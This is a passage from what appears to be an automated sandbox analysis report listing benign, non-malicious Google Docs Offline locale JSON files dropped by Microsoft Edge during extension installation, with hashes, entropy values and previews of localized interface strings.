                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1320
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):884
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):980
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1941
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                            MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                            SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                            SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                            SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1969
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                            MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                            SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                            SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                            SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1674
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                            MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                            SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                            SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                            SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                            MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                            SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                            SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                            SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1333
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1074
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1205
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
